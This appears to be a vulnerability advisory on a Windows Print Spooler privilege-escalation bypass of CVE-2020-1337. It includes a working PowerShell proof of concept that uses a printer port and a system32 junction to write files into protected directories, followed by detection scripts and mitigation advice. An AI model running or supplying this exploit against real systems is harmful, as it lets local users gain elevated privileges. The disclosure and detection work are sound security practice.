A New Dangerous Microsoft Windows Print Spooler Vulnerability

Both Microsoft Windows and Microsoft Windows Server are products of Microsoft Corporation.

Thursday, November 12, 2020, 10:19 GMT

Microsoft Windows is an operating system for personal devices, and Microsoft Windows Server is the family of server operating systems. Windows Print Spooler is the print spooler service built into Windows.

An elevation of privilege vulnerability exists in Microsoft Windows Print Spooler. An attacker can use a specially crafted application to exploit this vulnerability and run arbitrary code with elevated privileges.

The following products and versions are affected: Microsoft Windows 7 SP1, Windows 8.1, Windows RT 8.1, Windows 10, Windows Server 2008 SP2, Windows Server 2008 R2 SP1, Windows Server 2012, Windows Server 2012 R2, Windows Server 2016, Windows Server 2019, Windows 10 version 1607, Windows 10 version 1709, Windows 10 version 1803, Windows 10 version 1809, Windows 10 version 1903, Windows 10 version 1909, Windows 10 version 2004, Windows Server version 1903, Windows Server version 1909, Windows Server version 2004.

Details:

Windows: Local Spooler CVE-2020-1337 Bypass

One way to exploit this on Windows 10 version 2004 is to note that if the path reached after following the mount point is not under the server's root directory, the FileNormalizedNameInformation query fails. The admin$ share, for instance, points to c:\windows.

If the mount point is set to resolve to c:\Program Files, normalization fails and the original, unnormalized string is returned instead. This allows writing anywhere outside the windows directory by placing a mount point somewhere under system32. The following script, for example, would write a DLL to the root of program data.

# Create a real directory under system32 so the port path exists when the port is added
mkdir "C:\windows\system32\tasks\test"
Add-PrinterDriver -Name "Generic / Text Only"
# The port path points back into the local admin$ share, i.e. under c:\windows
Add-PrinterPort -Name "\\localhost\admin$\system32\tasks\test\test.dll"
Add-Printer -Name "PrinterExploit" -DriverName "Generic / Text Only" -PortName "\\localhost\admin$\system32\tasks\test\test.dll"
# Replace the directory with a junction that resolves outside c:\windows
rmdir "C:\windows\system32\tasks\test"
New-Item -ItemType Junction -Path "C:\windows\system32\tasks\test" -Value "C:\Program Files"
# Printing a job makes the spooler write the output through the junction
"TESTTEST" | Out-Printer -Name "PrinterExploit"
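The two artifacts the technique above leaves behind are a printer port whose name is a UNC path into the machine's own administrative share, and a junction under system32 that resolves outside the Windows directory. The following PowerShell is an added defender-side check written for this page; it is not code from the original report or from Microsoft. It assumes Windows PowerShell 5.1 or later with the PrintManagement module (Get-PrinterPort, Get-Printer) and administrator rights on the host being inspected; the function names and the default search root are this example's own choices.

```powershell
# Added example: triage checks for the spooler port / junction abuse described above.
# Assumptions: PowerShell 5.1+, PrintManagement module present, run as administrator.

function Get-SuspiciousPrinterPorts {
    # Printer ports normally name a physical device, an IP port or a remote share.
    # A port whose path loops back into this machine's own admin$ (or C$, D$ ...)
    # share lets the spooler write a print job into a local filesystem path chosen
    # by whoever created the port, which is the first step of the bypass.
    $pattern = '^\\\\(localhost|127\.0\.0\.1|' + [regex]::Escape($env:COMPUTERNAME) + ')\\(admin|[a-z])\$'
    $printers = Get-Printer -ErrorAction SilentlyContinue
    Get-PrinterPort | Where-Object { $_.Name -match $pattern } | ForEach-Object {
        $port = $_.Name
        $using = ($printers | Where-Object { $_.PortName -eq $port } | Select-Object -ExpandProperty Name) -join ','
        [pscustomobject]@{
            Port     = $port
            Printers = $using
            Reason   = 'Port path targets a local administrative share'
        }
    }
}

function Get-JunctionsLeavingWindowsDir {
    # Reparse points under a user-writable directory inside system32 whose target
    # lies outside %SystemRoot% are what defeats the normalization check.
    # The default root is an assumption for this example; widen it as needed.
    param([string]$Root = "$env:SystemRoot\System32\tasks")

    Get-ChildItem -Path $Root -Recurse -Attributes ReparsePoint -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Target is string[] on 5.1 and string on 7.x; normalize to the first entry.
            $target = @($_.Target)[0]
            if ($target -and -not ($target -like "$env:SystemRoot\*")) {
                [pscustomobject]@{
                    Path     = $_.FullName
                    LinkType = $_.LinkType
                    Target   = $target
                    Reason   = 'Reparse point under system32 resolves outside the Windows directory'
                }
            }
        }
}

# Usage: run both checks and review anything returned.
Get-SuspiciousPrinterPorts | Format-Table -AutoSize
Get-JunctionsLeavingWindowsDir | Format-Table -AutoSize
```

An empty result from both functions is the expected state on a healthy host. Findings from the first function should be matched against the printer's creation time (the spooler's operational event log records port and printer additions) and the account that created it; findings from the second function point at the directory to remove after the offending printer and port are deleted. Where the Print Spooler is not needed at all, stopping and disabling the service removes the attack surface entirely, and installing the vendor fix addresses the normalization flaw itself.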